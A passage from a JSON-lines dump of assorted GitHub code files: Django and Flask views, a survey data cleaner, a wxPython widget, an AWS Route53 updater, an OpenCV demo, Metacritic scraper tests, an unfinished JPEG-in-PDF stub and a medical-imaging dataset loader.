'product_list': product_list,\r\n }\r\n return render(request, 'storeFront.html', context)\r\n\r\n\r\ndef product(request, id):\r\n show_product = 
get_object_or_404(Product, pk=id)\r\n context = {\r\n 'product': show_product,\r\n\r\n }\r\n return render(request, 'productPage.html', context)\r\n","repo_name":"hbc0723/PrideStore","sub_path":"testStore/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74000761823","text":"import click\n\nclass jpeg:\n def __init__(self, fileName):\n with open(fileName, \"rb\") as data:\n jpg = bytearray(data.read())\n i = jpg.index(b\"\\xdb\")\n self.jfif = jpg[0:i-1]\n self.imageData = jpg[i:]\n\n @property\n def jfif(self):\n return self.__jfif\n\n @jfif.setter\n def jfif(self, jfif):\n self.__jfif = jfif\n\n @property\n def imageData(self):\n return self.__imageData\n\n @imageData.setter\n def imageData(self, imageData):\n self.__imageData = imageData\n\nclass jfif:\n def __init__(self, data):\n pass\n\nclass pdf:\n def __init__(self, fileName):\n with open(fileName, \"rb\") as data:\n pdf = bytearray(data.read())\n i = 0\n while i <= len(pdf):\n if chr(pdf[i]) == 'o' and chr(pdf[i+1]) == 'b' and chr(pdf[i+2]) == 'j':\n self.pdfHeader = pdf[:i-1]\n self.pdfData = pdf[i:]\n break\n i += 1\n\n @property\n def pdfHeader(self):\n return self.__pdfHeader\n\n @pdfHeader.setter\n def pdfHeader(self, pdfHeader):\n self.__pdfHeader = pdfHeader\n\n @property\n def pdfData(self):\n return self.__pdfData\n\n @pdfData.setter\n def pdfData(self, pdfData):\n self.__pdfData = pdfData\n\ndef jpgInPdf(jpg, pdf):\n output = bytearray()\n head = jpg.jfif\n tail = \"\"\n dummyObject = bytearray()\n head[2] = ord('\\x00')\n head[3] = ord('\\x00')\n output.extend(head)\n with open(\"out.pdf\", \"wb\") as outputFile:\n pass\n\nwith open(\"vapor.jpg\", \"rb\") as jpg:\n pdf = pdf(\"koc-do-you-want-vaporwave.pdf\")\n jpg = jpeg(\"vapor.jpg\") \n jpgInPdf(jpg, pdf)\n\n","repo_name":"Zrocket/pylyglot","sub_path":"pylyglot.py","file_name":"pylyglot.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12175259340","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = \"Nicolas Götzfried\"\n\"\"\"\nData processing script for Choice-Based Conjoint Analysis conducted via QuestionPro.\nThe script validate respondents based on three holdouts. Holdout choice set 1 and 3 have to be identical.\nThe script transforms the QuestionPro wide format into long format. It changes the following:\n1. Mapping attributes to levels with dummy variables\n2. Adding a none option for every conjoint tasks\n3. calculating a time variable, which is necessary for Cox regression\n4. 
enables a priori segmentation via \"respondent list\"\n\"\"\"\n\nimport pandas as pd # third-party library\nimport numpy as np # third-party library\n\n\ndef validate_holdouts():\n is_valid = [] # return list of valid respondents\n for respondent in holdout_respondents:\n # Iterating through respondentsIDs\n # The dataset size various from 0 to 3, depending on how many times a respondent selected 'none'\n # QuestionPro doesnt export the row, if 'none is selected'\n\n # dataframe containing selected holdout profiles\n selected_profiles = holdouts.loc[\n (holdouts[\"Response ID\"] == respondent) & (holdouts[\"Selected\"] == 1)]\n\n size = len(selected_profiles) # size indicates how many times 'none option' was selected\n\n if size == 1: # size 1 => respondent selected 2 times 'none'\n if (selected_profiles.iloc[0][\"Concept ID\"] == 3) or (selected_profiles.iloc[0][\"Concept ID\"]) == 4:\n is_valid.append(respondent)\n else:\n if size == 2: # size 2 => respondent selected 1 time 'none': e.g. concept 1 == concept 5\n if (selected_profiles.iloc[0][\"Concept ID\"] + 4) == selected_profiles.iloc[1][\"Concept ID\"]:\n is_valid.append(respondent)\n else: # size 3 => no none option: same as size 2\n if (selected_profiles.iloc[0][\"Concept ID\"] + 4) == selected_profiles.iloc[2][\"Concept ID\"]:\n is_valid.append(respondent)\n return is_valid # list of valid respondent ids\n\n\ndef to_long_format(wide):\n rows_list = []\n for i in range(0, len(wide)):\n # QuestionPro does not export a third row for concept 3 none\n # second rows are the interesting ones, if more concepts are displayed\n # to the user \"(i-1) % 2 == 0\" has to be updated\n # Creating a List of Rows -> transforming from attributes to levels + adding none option\n\n # is it the second concept? if true get row 1 and row 2 , row 3 is none option\n if (i - 1) % 2 == 0:\n row1 = wide.iloc[i - 1]\n row2 = wide.iloc[i]\n # creating 3 rows for the long dataset and adding those to the rows_list\n row1_long = []\n row2_long = []\n row3_long = []\n # adding the mapping from wide format (1-4) to binary long format (0,1)\n choices = {1: [1, 0, 0, 0], 2: [0, 1, 0, 0], 3: [0, 0, 1, 0], 4: [0, 0, 0, 1]} # hashmap-> wide->long\n for j in range(len(row2)):\n # Respondent\n if j == 0:\n row1_long.append(row1[j])\n row2_long.append(row2[j])\n row3_long.append(row2[j])\n # Task ID (cumulative)\n elif j == 1:\n conjoint_task = int(((i-1)/2)+1)\n row1_long.append(conjoint_task)\n row2_long.append(conjoint_task)\n row3_long.append(conjoint_task)\n # Concept ID\n elif j == 2:\n row1_long.append(row1[j])\n row2_long.append(row2[j])\n row3_long.append(3)\n # goals 3, tracking 4, reinforcement 5, self-efficay 6, social support 7, provider 8\n elif 3 <= j <= 8:\n # to list() is mandatory, because append works only for lists not numpy arrays\n row1_long = np.concatenate((row1_long, choices.get(row1[j])), axis=None).tolist()\n row2_long = np.concatenate((row2_long, choices.get(row2[j])), axis=None).tolist()\n row3_long = np.concatenate((row3_long, [0, 0, 0, 0]), axis=None).tolist()\n # none option level\n elif j == 9:\n row1_long.append(0)\n row2_long.append(0)\n row3_long.append(1)\n # selected, if case ow1[j] == 0 & row2[j] == 0: none option is selected\n elif j == 10:\n # If concept 1 and concept 2 is not selected, concept 3 'none' is selected\n if row1[j] == 0 and row2[j] == 0:\n row1_long.append(0)\n row2_long.append(0)\n row3_long.append(1)\n else:\n row1_long.append(row1[j])\n row2_long.append(row2[j])\n row3_long.append(0)\n rows_list.append(row1_long)\n 
rows_list.append(row2_long)\n rows_list.append(row3_long)\n return rows_list\n\n\nif __name__ == '__main__':\n # reading \"Full Profile\" for all Respondents, 7 conjoint tasks each respondent\n full_profile = pd.read_csv(\"cbca_profiles.CSV\", delimiter=\";\")\n # reading holdouts, 3 holdout tasks each respondent\n holdouts = pd.read_csv(\"cbca_holdouts.CSV\", delimiter=\";\")\n # reading a list of respondents im interested in (filtering done by spss)\n conditionCSV = \"seg_adoption_nonuser.csv\"\n interested_respondents = pd.read_csv(conditionCSV)\n # addtional Information for CBCA\n # tasks = 7\n # concepts = 2\n\n # level of attributrs\n goals_level = [\"weekly goals\", \"menu planning exercise\", \"set amount of calorie intake\",\n \"daily habit challenge per week\"]\n tracking_level = [\"tracking via food-database\", \"tracking via recipes\", \"Import recipes from websites\",\n \"track via photo\"]\n reinforcement_level = [\"life-score\", \"surprise challenges\", \"tracking reminder\", \"food displayed in color\"]\n selfefficay_level = [\"food diary\", \"progress graph of intake\", \"confidence scale\", \"feedback on goal progress\"]\n socialsupport_level = [\"interaction with Family Friends Peers\", \"invite person to track users food\",\n \"role models performing target behavior\", \"Sharing achievements\"]\n provider_level = [\"non profit organization\", \"well known company\", \"start-up\", \"insurance company\"]\n\n # attributes in English (questionPro export is german(default language)) \"Ziele\" -> \"goals\"\n renamed_columns = ['Response ID', 'Task ID', 'Concept ID', 'goals', 'tracking', 'reinforcement',\n 'self-efficay', 'social support', 'provider', 'Parts Worth', 'selected',\n 'Standard Deviation', 'Confidence Interval Range 1', 'Confidence Interval Range 2']\n\n # renaming attributes from German to English\n full_profile.columns = renamed_columns\n\n # adding a new level \"none\" at index 10 to the dataset (filled with dummy value -1)\n full_profile[\"none\"] = -1\n columns = list(full_profile.columns)\n full_profile = full_profile[columns[:9] + [columns[-1]] + [columns[10]]]\n\n # adding \"time\" to the end of the dataset with dummy values -1\n full_profile[\"time\"] = -1\n\n all_respondents = pd.unique(full_profile[\"Response ID\"])\n holdout_respondents = pd.unique(holdouts[\"Response ID\"])\n\n # symmetric difference for respondents which selected 3 times the none option (These are valid respondents)\n always_none_respondents = list(set(all_respondents) - set(holdout_respondents))\n\n # getting valid respondents (checking holdouts) (list of valid respondents)\n valid_respondents = validate_holdouts()\n\n # Adding User who picked 3 times none in the holdouts, they are not part of the holdouts\n # dataset, because QuestionPro does not export the none option rows\n for resp in always_none_respondents:\n valid_respondents.append(resp)\n\n respondents_conditioned = np.intersect1d(valid_respondents, interested_respondents)\n valid_profiles = full_profile[full_profile['Response ID'].isin(respondents_conditioned)]\n\n # final dataset header in long format (including levels not attributes)\n final_arr = np.concatenate((['Response ID', 'Task ID', 'Concept ID'], goals_level, tracking_level,\n reinforcement_level, selfefficay_level, socialsupport_level,\n provider_level, ['none', 'selected']), axis=None).tolist()\n # getting Data into long format, adding None options\n long_format = to_long_format(valid_profiles)\n df_final = pd.DataFrame(long_format, columns=final_arr)\n\n # 
adding time variable for Cox Regression (Backhaus et.al) (-(selected-2))\n df_final[\"time\"] = (-(df_final[\"selected\"] - 2))\n\n # saving Data\n df_final.to_csv(conditionCSV[:-4] + \"_long_clean.csv\", sep=\";\", index=False)\n\n # Summary for complete Dataset not on filtered one\n print(\"Number of respondents: \" + str(len(all_respondents)))\n print(\"Number of consistent respondents: \" + str(len(valid_respondents)))\n print(\"Number of respondents after segmentation: \" + str(len(pd.unique(valid_profiles[\"Response ID\"]))))\n print(\"ValidationRate = \" + str(round(((len(valid_respondents) / len(all_respondents)) * 100), 2))\n + \"% of all respondents are consistent in their holdout selection\")\n","repo_name":"sampler123/BA_data_pipeline","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29137285678","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('login', '0005_auto_20151130_1956'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='subject',\n field=models.CharField(max_length=15, choices=[(b'Datastructure', b'Datastructure'), (b'WebProgramming', b'WebProgramming'), (b'General', b'General'), (b'Java', b'Java'), (b'DBMS', b'DBMS')]),\n ),\n ]\n","repo_name":"msandeepa/Discussion-forum","sub_path":"login/migrations/0006_auto_20151201_1003.py","file_name":"0006_auto_20151201_1003.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24979094287","text":"import wx\n\nfrom pdesign.widgets import const, BOTTOM, CENTER, LEFT, ALL, EXPAND\nfrom pdesign.widgets import Application, MainWindow, Entry\nfrom pdesign.widgets import HPanel, VPanel\nfrom pdesign.widgets.basic import SpinButton, SizedPanel\nfrom pdesign.widgets.generic import RangeDataWidget\n\nclass FloatSpin(wx.Panel, RangeDataWidget):\n\n\tentry = None\n\tsb = None\n\n\tflag = True\n\tvalue = 0.0\n\trange_val = (0.0, 1.0)\n\tstep = 0.01\n\tdigits = 2\n\tcallback = None\n\n\tdef __init__(self, parent, value=0.0, range_val=(0.0, 1.0), step=0.01,\n\t\t\t\tdigits=2, size=const.DEF_SIZE, width=0, spin_overlay=True,\n\t\t\t\tonchange=None, check_focus=True):\n\n\t\tself.callback = onchange\n\t\tif const.is_mac(): spin_overlay = False\n\n\t\twx.Panel.__init__(self, parent)\n\t\t#self.SetBackgroundColour(wx.RED)\n\t\tif spin_overlay:\n\t\t\tif const.is_gtk():\n\t\t\t\tself.entry = Entry(self, '', size=size, width=width)#,\n\t\t\t\t\t\t#onchange=self._check_entry, onenter=self._entry_enter)\n\t\t\t\tsize = (-1, self.entry.GetSize()[1])\n\t\t\t\tself.sb = SpinButton(self, size=size)\n\t\t\t\tw_pos = self.entry.GetSize()[0] - 5\n\t\t\t\tself.sb.SetPosition((w_pos, -1))\n\t\t\t\tline = HPanel(self)\n\t\t\t\tline.SetSize((1, self.sb.GetSize()[1] - 1))\n\t\t\t\tline.set_bg(const.UI_COLORS['dark_shadow'])\n\t\t\t\tline.SetPosition((w_pos - 1, -1))\n\t\t\telif const.is_msw():\n\t\t\t\tself.entry = Entry(self, '', size=size, width=width)#,\n\t\t\t\t\t\t#onchange=self._check_entry, onenter=self._entry_enter)\n\t\t\t\tsize = (-1, self.entry.GetSize()[1] - 1)\n\t\t\t\tself.sb = SpinButton(self.entry, size=size)\n\t\t\t\tw_pos = self.entry.GetSize()[0] - self.sb.GetSize()[0] - 2\n\t\t\t\tself.sb.SetPosition((w_pos, -2))\n\t\telse:\n\t\t\tself.box 
= wx.BoxSizer(const.HORIZONTAL)\n\t\t\tself.SetSizer(self.box)\n\t\t\tself.entry = Entry(self, '', size=size, width=width)#,\n\t\t\t\t\t\t#onchange=self._check_entry, onenter=self._entry_enter)\n\t\t\tself.box.Add(self.entry, 0, wx.ALL)\n\t\t\tsize = (-1, self.entry.GetSize()[1])\n\t\t\tself.sb = SpinButton(self, size=size)#, onchange=self._check_spin)\n\t\t\tself.box.Add(self.sb, 0, wx.ALL)\n\n\nclass WidgetPanel(HPanel):\n\n\tname = 'Basic widgets'\n\tspin = None\n\n\tdef __init__(self, parent):\n\t\tHPanel.__init__(self, parent)\n\t\tself.build()\n\n\tdef build(self):\n\t\tflags = LEFT | CENTER\n\t\tpflags = ALL | EXPAND\n\t\tself.add(FloatSpin(self), 0, ALL, 2)\n\t\tself.add(FloatSpin(self), 0, ALL, 2)\n\n\napp = Application('wxWidgets')\nmw = MainWindow('Spin widget', (300, 250))\np = VPanel(mw)\nmw.add(p, 1, ALL | EXPAND)\npanel = WidgetPanel(mw)\np.add(panel, 1, ALL | EXPAND, 10)\napp.mw = mw\napp.run()\n","repo_name":"peterockpile/print-design","sub_path":"src/ui-tests/spin_control.py","file_name":"spin_control.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37062964392","text":"\n\nfrom Route53 import Route53\n\nclass namerecord:\n def __init__(self, recordname, recordtype, ttl, DNSZone, region, newelbname, currentelbname=None):\n self._recordname = recordname\n self._recordtype = recordtype\n self._ttl = ttl\n self._DNSZone = DNSZone\n self._region = region\n self._newelbname = newelbname\n self._currentelbname = currentelbname\n \n def update(self):\n #instantiate Record changelist\n updaterecord = Route53(self._recordname, self._DNSZone, self._recordtype, self._ttl, self._region, self._currentelbname)\n #get current elb info and add delete record change to list\n currentelbendpoint = updaterecord.getelbinfo(self._currentelbname)\n updaterecord.deleterecord(currentelbendpoint)\n #get new elb info and add create record change to list\n newelbendpoint = updaterecord.getelbinfo(self._newelbname)\n updaterecord.createrecord(newelbendpoint)\n updaterecord.commitrecord() \n \n def create(self):\n #Get ELB info \n updaterecord = Route53(self._recordname, self._DNSZone, self._recordtype, self._ttl, self._region, self._newelbname)\n newelbendpoint = updaterecord.getelbinfo(self._newelbname)\n updaterecord.createrecord(newelbendpoint)\n updaterecord.commitrecord() \n\n \n \n \n","repo_name":"grantleehoffman/BGDeploy","sub_path":"bgdeploy/project/namerecord.py","file_name":"namerecord.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25201409339","text":"import flask \nfrom flask import request, make_response\nfrom main import app, db\nfrom main.models import Entry\nfrom sqlalchemy import desc\nimport datetime\nfrom io import StringIO\nimport csv\n\n@app.route('/', methods=['get','post'])\ndef show_entry():\n return flask.render_template('entry.html')\n\n@app.route('/entry-done', methods=['GET','POST'])\ndef add_entry():\n entry = Entry(\\\n line_id =flask.request.form['line_id']\\\n ,line_name =flask.request.form['line_name']\\\n ,temp =flask.request.form['temp']\\\n ,date =datetime.datetime.now()\\\n ,breathlessness =flask.request.form['breathlessness']\\\n ,dullness =flask.request.form['dullness']\\\n ,comment =flask.request.form['comment'])\n db.session.add(entry)\n db.session.commit()\n specified_id = request.form.get('line_id')\n specified_name = 
request.form.get('line_name')\n sorted_result = db.session.query(Entry)\\\n .filter(Entry.line_id == specified_id)\\\n .order_by(desc(Entry.date))\\\n .all()\n return flask.render_template('logs-result.html', specified_id=specified_id, specified_name=specified_name, sorted_result=sorted_result)\n\n@app.route('/logs-ent', methods=['GET','POST'])\ndef show_logsent():\n return flask.render_template('logs-ent.html')\n\n@app.route('/logs-result', methods=['GET','post'])\ndef sort_logs():\n specified_id = request.form.get('line_id')\n specified_name = request.form.get('line_name')\n sorted_result = db.session.query(Entry)\\\n .filter(Entry.line_id == specified_id)\\\n .order_by(desc(Entry.date))\\\n .all()\n return flask.render_template('logs-result.html', specified_id=specified_id, specified_name=specified_name, sorted_result=sorted_result)\n\n@app.route('/download//', methods=['get','post'])\ndef download_csv(key):\n f = StringIO()\n writer = csv.writer(f, quotechar='\"', quoting=csv.QUOTE_ALL, lineterminator=\"\\n\")\n\n if key == 'all':\n writer.writerow(['id','line_name','date','temp','breathlessness','dullness','comment'])\n for i in Entry.query.order_by(Entry.id.desc()).all():\n writer.writerow([i.id, i.line_name, i.date, i.temp, i.breathlessness, i.dullness, i.comment])\n else:\n writer.writerow(['Record No','LINE name','Recorded at','Temperature','Short of breath','Feeling sluggish','Other notes'])\n for i in Entry.query.filter(Entry.line_id == key).order_by(Entry.id.desc()).all():\n writer.writerow([i.id, i.line_name ,i.date.strftime('%a %m-%d %H:%M'), i.temp, i.breathlessness, i.dullness, i.comment])\n \n dt_now = datetime.datetime.now()\n res = make_response()\n res.data = f.getvalue()\n res.headers['Content-Type'] = 'text/csv'\n res.headers['Content-Disposition'] = 'attachment; filename = ken-on-log_'+ dt_now.strftime('%Y%m%d-%H:%M:%S') +'.csv'\n return res\n\n\n\n# How to write SQL queries\n# The canonical form uses the session: db.session.query(Entry).all()\n# Thanks to the helper on the 'Entry' class this can be shortened to Entry.query.all()\n# 'Entry' class name = table name\n# .query the query (instruction)\n# order_by(Entry.id.desc()) descending order of the 'id' column\n# .all() fetch all rows","repo_name":"kazuyamano/ken-on-kun-liff","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12469227825","text":"import cv2\nimport numpy as np\nimg=cv2.imread(\"C:/Users/Windows 10/Downloads/sudoku.png\")\ngray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nedges=cv2.Canny(gray,50,50)\ncv2.imshow(\"Original\",img)\n#output vector of edges of lines\nlines=cv2.HoughLines(edges,1,np.pi/180,200)\nfor line in lines:\n rho,theta=line[0]\n x0=rho*np.cos(theta)\n y0=rho*np.sin(theta)\n x1=int(x0-1000*np.sin(theta))\n y1=int(y0+1000*np.cos(theta))\n x2=int(x0+1000*np.sin(theta))\n y2=int(y0-1000*np.cos(theta))\n cv2.line(img,(x1,y1),(x2,y2),(0,255,255),2)\n print(f\"points:({x1},{y1}),({x2},{y2})\")\ncv2.imshow(\"Image\",img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Akash-Krishna-PM/Activity","sub_path":"2022_01_19/hough.py","file_name":"hough.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11140459286","text":"# pylint: disable=missing-function-docstring, too-many-function-args, missing-module-docstring\n\nimport os\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nfrom bs4 import BeautifulSoup\nfrom scrapers.metacritic.scrape_games_data import *\nfrom scrapers.metacritic.scrape_games_lists import *\nfrom scrapers.metacritic.scrape_metacritic_reviews import *\nfrom 
scrapers.metacritic.scrape_metacritic_reviews import *\nfrom scrapers.metacritic.scrape_user_reviews import *\nfrom scrapers.metacritic.scrape_utils import *\n\n########################################################################\n# Scrape Games Data\n########################################################################\n\n\ndef test_fuzzy_match():\n # Test fuzzy matching with different thresholds\n\n game_names = [\"Halo\", \"Forza Horizon\", \"Gears of War\"]\n\n # Test exact match (threshold = 0)\n assert fuzzy_match(\"Halo 3\", game_names, threshold=60) == \"Halo\"\n\n # Test looser match (threshold = 20)\n assert fuzzy_match(\"Gears\", game_names, threshold=20) == \"Gears of War\"\n\n # Test stricter match (threshold = 80)\n assert fuzzy_match(\"Halo 3\", game_names, threshold=80) == \"Halo\"\n\n\n@pytest.fixture\ndef example_df() -> pd.DataFrame:\n # Create an example DataFrame for testing\n return pd.DataFrame({\"Name\": [\"xdxdxdxd\", \"Terraria\", \"CrossfireX\"]})\n\n\ndef test_add_gamepass_status(example_df):\n # Test the add_gamepass_status function\n\n # Generate output DataFrame\n output_df = add_gamepass_status(example_df)\n\n # Assert column names in the output DataFrame\n assert set(output_df.columns) == {\"Name\", \"Gamepass_Status\"}\n\n # Assert Gamepass status for specific rows\n assert output_df.loc[0, \"Gamepass_Status\"] == \"Not Included\"\n assert output_df.loc[1, \"Gamepass_Status\"] == \"Active\"\n assert output_df.loc[2, \"Gamepass_Status\"] == \"Removed\"\n\n\ndef test_scrape_game_data():\n # Test the scrape_game_data function with a specific link\n\n link = \"https://www.metacritic.com/game/switch/the-legend-of-zelda-links-awakening\"\n\n # Scrape game data\n game_data = scrape_game_data(link)\n\n # Assert the extracted game data\n assert game_data is not None\n assert game_data[\"Name\"] == \"The Legend of Zelda: Link's Awakening\"\n assert game_data[\"Release Date\"] == \"2019-09-20\"\n assert game_data[\"Maturity Rating\"] == \"E\"\n assert game_data[\"Genre\"] == \"Action Adventure, Open-World\"\n assert game_data[\"Developer\"] == \"Nintendo\"\n assert game_data[\"Publisher\"] == \"Nintendo\"\n # Update the following assertions to the latest values for accurate testing\n # assert int(game_data[\"Meta Score\"]) == 87\n # assert int(game_data[\"Critic Reviews Count\"]) == 111\n # assert game_data[\"User Score\"] == 8.4\n # assert game_data[\"User Rating Count\"] == 1653\n assert \"Summary\" in game_data\n\n\ndef test_extract_game_data():\n # Test the extract_game_data function with specific input data and soup\n\n # Sample input data\n data = {\n \"name\": \"The Legend of Zelda: Link's Awakening\",\n \"gamePlatform\": \"Nintendo Switch\",\n \"description\": \"Summary of the game\",\n \"image\": \"https://example.com/game_image.jpg\",\n \"datePublished\": \"September 20, 2019\",\n \"contentRating\": \"ESRB E\",\n \"genre\": [\"Action Adventure\", \"Open-World\"],\n \"publisher\": [{\"name\": \"Nintendo\"}],\n \"aggregateRating\": {\"ratingValue\": 87},\n }\n\n # Sample input soup\n soup = BeautifulSoup(\n \"\"\"\n\n \n 111 reviews\n
8.4
\n [\n
\n

\n Universal acclaim\n \n - based\n on \n 86\n Critic Reviews \n What's this? \n

\n
\n , \n
\n

Generally favorable\n reviews- based on 3735 Ratings\n

\n
\n ]\n \n\n \"\"\",\n \"html.parser\",\n )\n\n # Extract game data\n game_data = extract_game_data(data, soup)\n\n # Assert the extracted game data\n assert game_data[\"Name\"] == \"The Legend of Zelda: Link's Awakening\"\n assert game_data[\"Release Date\"] == \"2019-09-20\"\n assert game_data[\"Maturity Rating\"] == \"E\"\n assert game_data[\"Genre\"] == \"Action Adventure, Open-World\"\n assert game_data[\"Platform\"] == \"Nintendo Switch\"\n assert game_data[\"Developer\"] == \"Nintendo\"\n assert game_data[\"Publisher\"] == \"Nintendo\"\n assert game_data[\"Meta Score\"] == 87\n assert game_data[\"Summary\"] == \"Summary of the game\"\n assert game_data[\"Image\"] == \"https://example.com/game_image.jpg\"\n assert game_data[\"Critic Reviews Count\"] == 111\n assert game_data[\"User Score\"] == 8.4\n assert game_data[\"User Rating Count\"] == 3735\n\n\ndef test_extract_release_date():\n # Test the extract_release_date function with different input data\n data = {\"datePublished\": \"September 20, 2019\"}\n assert extract_release_date(data) == \"2019-09-20\"\n\n data = {\"datePublished\": \"\"}\n assert extract_release_date(data) == \"\"\n\n data = {}\n assert extract_release_date(data) == \"\"\n\n\ndef test_extract_maturity_rating():\n # Test the extract_maturity_rating function with different input data\n data = {\"contentRating\": \"ESRB E\"}\n assert extract_maturity_rating(data) == \"E\"\n\n data = {\"contentRating\": \"\"}\n assert extract_maturity_rating(data) == \"\"\n\n data = {}\n assert extract_maturity_rating(data) == \"Unspecified\"\n\n\ndef test_extract_genre():\n # Test the extract_genre function with different input data\n data = {\"genre\": [\"Action\", \"Adventure\"]}\n assert extract_genre(data) == \"Action, Adventure\"\n\n data = {\"genre\": []}\n assert extract_genre(data) == \"\"\n\n data = {}\n assert extract_genre(data) == \"\"\n\n\ndef test_extract_developer():\n # Test the extract_developer function with different input soup\n soup = BeautifulSoup(\n \"\", \"html.parser\"\n )\n assert extract_developer(soup) == \"Nintendo\"\n\n soup = BeautifulSoup(\"\", \"html.parser\")\n assert extract_developer(soup) == \"\"\n\n\ndef test_extract_publisher():\n # Test the extract_publisher function with different input data\n data = {\"publisher\": [{\"name\": \"Nintendo\"}, {\"name\": \"Sony\"}]}\n assert extract_publisher(data) == \"Nintendo, Sony\"\n\n data = {\"publisher\": []}\n assert extract_publisher(data) == \"\"\n\n data = {}\n assert extract_publisher(data) == \"\"\n\n\ndef test_extract_meta_score():\n # Test the extract_meta_score function with different input data\n data = {\"aggregateRating\": {\"ratingValue\": 87}}\n assert extract_meta_score(data) == 87\n\n data = {\"aggregateRating\": {}}\n assert extract_meta_score(data) is None\n\n data = {}\n assert extract_meta_score(data) is None\n\n\ndef test_extract_critic_review_count():\n # Test the extract_critic_review_count function with different input soup\n soup = BeautifulSoup(\n \"\"\"\n \n 111 reviews\n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_critic_review_count(soup) == 111\n\n soup = BeautifulSoup(\n \"\"\"\n \n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_critic_review_count(soup) == 0\n\n\ndef test_extract_user_score():\n # Test the extract_user_score function with different input soup\n soup = BeautifulSoup(\n \"\"\"\n \n
8.4
\n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_score(soup) == 8.4\n\n soup = BeautifulSoup(\n \"\"\"\n \n
tbd
\n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_score(soup) is None\n\n soup = BeautifulSoup(\n \"\"\"\n \n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_score(soup) is None\n\n\ndef test_extract_user_rating_count():\n # Test the extract_user_rating_count function with different input soup\n soup = BeautifulSoup(\n \"\"\"\n \n\n \n 111 reviews\n
8.4
\n [\n
\n

\n Universal acclaim\n \n - based\n on \n 86\n Critic Reviews \n What's this? \n

\n
\n , \n
\n

Generally favorable\n reviews- based on 3735 Ratings\n

\n
\n ]\n \n\n \"\"\",\n \"html.parser\",\n )\n assert extract_user_rating_count(soup) == 3735\n\n soup = BeautifulSoup(\n \"\"\"\n \n
Some other information
\n \n \"\"\",\n \"html.parser\",\n )\n assert extract_user_rating_count(soup) == 0\n","repo_name":"Liftingthedata/xbox_de_project","sub_path":"tests/test_metacritic_scrape_games.py","file_name":"test_metacritic_scrape_games.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8292351848","text":"import os\nfrom traceback import print_tb\nfrom typing import Callable, Optional, Tuple\nimport sys\n\nimport SimpleITK as sitk\nfrom pathlib import Path\nimport torch\nfrom torch.utils.data import Dataset\nimport pandas as pd\nimport numpy as np\n\nimport nibabel as nib\nimport pathlib\nfrom einops import rearrange\n\nfrom joblib import Parallel, delayed\n\nfrom sklearn.preprocessing import scale\n\nfrom torchmtlr.utils import make_time_bins, encode_survival\n\n\ndef get_paths_to_patient_files(path_to_imgs, PatientID, append_mask=True):\n path_to_imgs = pathlib.Path(path_to_imgs)\n\n patients = [p for p in PatientID] # if os.path.isdir(path_to_imgs / p)\n paths = []\n for p in patients:\n print('p is ',p)\n print('path_to_imgs is ',path_to_imgs)\n path_to_ct = path_to_imgs / (p + '_image.nii.gz')\n\n if append_mask:\n path_to_mask = path_to_imgs/ (p + '_mask_GTV.nii.gz')\n paths.append((path_to_ct, path_to_mask))\n else:\n paths.append((path_to_ct))\n return paths\n\nclass HecktorDataset(Dataset):\n\n def __init__(self,\n root_directory:str, \n clinical_data_path:str, \n time_bins:int = 14,\n cache_dir:str = \"data_cropped/data_cache/\",\n transform: Optional[Callable] = None,\n num_workers: int = 1,\n num_classes: int = 2,\n patient_split:bool =True\n ):\n print(cache_dir)\n self.num_of_seqs = 1 #CT only\n # self.num_of_seqs = 2 #CT PT\n \n self.root_directory = root_directory\n\n self.transforms = transform\n self.num_workers = num_workers\n self.num_classes = num_classes\n\n self.clinical_data = self.make_data(clinical_data_path)\n \n # important, whether the time bins determine by number of event ################################\n\n if patient_split:\n self.time_bins1 = make_time_bins(times=self.clinical_data[\"time1\"], num_bins=time_bins)\n self.time_bins2 = make_time_bins(times=self.clinical_data[\"time2\"], num_bins=time_bins)\n self.time_bins3 = make_time_bins(times=self.clinical_data[\"time3\"], num_bins=time_bins)\n self.time_bins4 = make_time_bins(times=self.clinical_data[\"time4\"], num_bins=time_bins)\n self.time_bins5 = make_time_bins(times=self.clinical_data[\"time5\"], num_bins=time_bins)\n else:\n self.time_bins1 = make_time_bins(times=self.clinical_data[\"time1\"], num_bins=time_bins, event = self.clinical_data[\"event1\"])\n self.time_bins2 = make_time_bins(times=self.clinical_data[\"time2\"], num_bins=time_bins, event = self.clinical_data[\"event2\"])\n self.time_bins3 = make_time_bins(times=self.clinical_data[\"time3\"], num_bins=time_bins, event = self.clinical_data[\"event3\"])\n self.time_bins4 = make_time_bins(times=self.clinical_data[\"time4\"], 